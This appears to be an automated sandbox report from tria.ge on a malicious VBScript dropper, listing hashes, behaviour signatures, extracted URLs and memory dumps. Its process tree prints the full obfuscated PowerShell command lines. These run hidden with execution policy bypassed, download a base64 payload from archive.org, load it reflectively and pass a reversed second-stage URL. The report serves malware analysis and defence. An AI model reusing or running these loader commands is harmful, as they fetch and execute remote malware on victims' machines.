Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

PO_NODF9087.vbs

windows7-x64

10

PO_NODF9087.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16/09/2024, 14:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO_NODF9087.vbs

  • Size

    237KB

  • MD5

    9e58cfdb4b036627fd9f2713826c023a

  • SHA1

    e29d9ea8098c7b48c4155001a17f0db41907b1a5

  • SHA256

    186313dcc5e093e7997eaa5e1bd8e9d788bcb35537ab3d6741e3b6e37eecfa60

  • SHA512

    2b003e99e56973cc691e89eed4b9a42fb320e982d444adcfbc2fbe7a4b554a711df2e7c7e684b33abdbd417a8c26d84e88504a4be7b2d8b28cc4ab5fdf4d503a

  • SSDEEP

    6144:2G9rLSoa5bOCXLvtrodqZJR2pnCc9Q5ec8:f9reoa5yCXLvtUqx+79Q5ec8

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_NODF9087.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWUZsdXJsID0gTVNSJysnaHR0cCcrJ3M6Ly9pYTYwMDEwJysnMC4nKyd1cy5hcmNoaScrJ3ZlJysnLm9yZy8yNCcrJy9pdGUnKydtcycrJy9kZXRhaC1ub3RlLXYvRGV0YWgnKydObycrJ3RlVi50JysneCcrJ3RNU1InKyc7WScrJ0ZsYmFzZTY0JysnQ29udGVudCA9IChOZXcnKyctT2JqJysnZWN0IFN5c3RlbS5OZScrJ3QuVycrJ2ViQ2wnKydpJysnZW50JysnKS5EJysnbycrJ3duJysnbG9hZFMnKyd0cmluZygnKydZRicrJ2x1cmwpO1lGJysnbCcrJ2JpbmEnKydyeUNvbnQnKydlbnQgJysnPSBbJysnU3lzdGVtLkNvJysnbnZlcnRdOjpGcm9tQicrJ2FzZTY0U3RyaW4nKydnKFlGJysnbGJhcycrJ2U2NENvbnRlbnQnKycpO1lGJysnbGEnKydzc2VtYmx5JysnICcrJz0gW1JlZmwnKydlY3Rpb24uQXNzZW1iJysnbHldOjonKydMb2FkKCcrJ1lGJysnbGJpbicrJ2FyeUNvbnQnKydlbicrJ3QpO1knKydGbHR5JysncGUgPSBZRmxhcycrJ3NlJysnbWJseScrJy4nKydHZScrJ3RUeXBlKE1TUicrJ1J1JysnblAnKydFLkhvbWVNU1InKycpO1lGbG0nKydldGhvZCA9ICcrJ1lGJysnbHR5cGUuR2V0TWV0aG8nKydkJysnKE1TJysnUlZBSU1TJysnUik7WUZsbWV0aG9kLkludm9rJysnZShZJysnRicrJ2wnKydudWxsLCBbb2JqZWN0JysnW11dQCcrJyhNJysnU1J0eHQuT0lOTkMnKycvJysnNScrJzc3JysnLzYnKyc1MS4zMycrJzEuMzInKycuODkxLycrJy86cHR0aE0nKydTUiAsICcrJ01TUmQnKydlJysncycrJ2EnKyd0aXZhZCcrJ29NJysnUycrJ1IgLCBNU1JkZXNhdGl2YWRvTVMnKydSICwgTVNSZGVzJysnYXRpdmFkb01TJysnUixNUycrJ1InKydSZScrJ2dBcycrJ21NUycrJ1IsTVNSTVNSKSknKSAgLVJFcGxBQ2UgKFtjaEFyXTg5K1tjaEFyXTcwK1tjaEFyXTEwOCksW2NoQXJdMzYgIC1DUmVQbGFjZSAgKFtjaEFyXTc3K1tjaEFyXTgzK1tjaEFyXTgyKSxbY2hBcl0zOSl8JiggJFBTSE9tZVsyMV0rJFBTSE9tZVszMF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('YFlurl = MSR'+'http'+'s://ia60010'+'0.'+'us.archi'+'ve'+'.org/24'+'/ite'+'ms'+'/detah-note-v/Detah'+'No'+'teV.t'+'x'+'tMSR'+';Y'+'Flbase64'+'Content = (New'+'-Obj'+'ect System.Ne'+'t.W'+'ebCl'+'i'+'ent'+').D'+'o'+'wn'+'loadS'+'tring('+'YF'+'lurl);YF'+'l'+'bina'+'ryCont'+'ent '+'= ['+'System.Co'+'nvert]::FromB'+'ase64Strin'+'g(YF'+'lbas'+'e64Content'+');YF'+'la'+'ssembly'+' '+'= [Refl'+'ection.Assemb'+'ly]::'+'Load('+'YF'+'lbin'+'aryCont'+'en'+'t);Y'+'Flty'+'pe = YFlas'+'se'+'mbly'+'.'+'Ge'+'tType(MSR'+'Ru'+'nP'+'E.HomeMSR'+');YFlm'+'ethod = '+'YF'+'ltype.GetMetho'+'d'+'(MS'+'RVAIMS'+'R);YFlmethod.Invok'+'e(Y'+'F'+'l'+'null, [object'+'[]]@'+'(M'+'SRtxt.OINNC'+'/'+'5'+'77'+'/6'+'51.33'+'1.32'+'.891/'+'/:ptthM'+'SR , '+'MSRd'+'e'+'s'+'a'+'tivad'+'oM'+'S'+'R , MSRdesativadoMS'+'R , MSRdes'+'ativadoMS'+'R,MS'+'R'+'Re'+'gAs'+'mMS'+'R,MSRMSR))') -REplACe ([chAr]89+[chAr]70+[chAr]108),[chAr]36 -CRePlace ([chAr]77+[chAr]83+[chAr]82),[chAr]39)|&( $PSHOme[21]+$PSHOme[30]+'x')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2740

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d4296a5a8b9d0e8da5593ce5b5f9d25c

    SHA1

    0cee19ad1556e8100070aefc2a2b80325ccf3914

    SHA256

    f7f3982f057a429499e94d14e5fdda9f8fcea795e56a81eb94882f5fe3cbe10a

    SHA512

    c0c8654b608932324c5b37d61ffe69c7b6398a8f1f89b90b350e22c8237932ecf7aa3488ab216900cba3d1bf8a7b62d90375f58f85f4f03a530ea04b75f8522d

    Download Submit

  • memory/2820-4-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2820-5-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2820-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2820-12-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2820-13-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

    Filesize

    9.6MB

    Download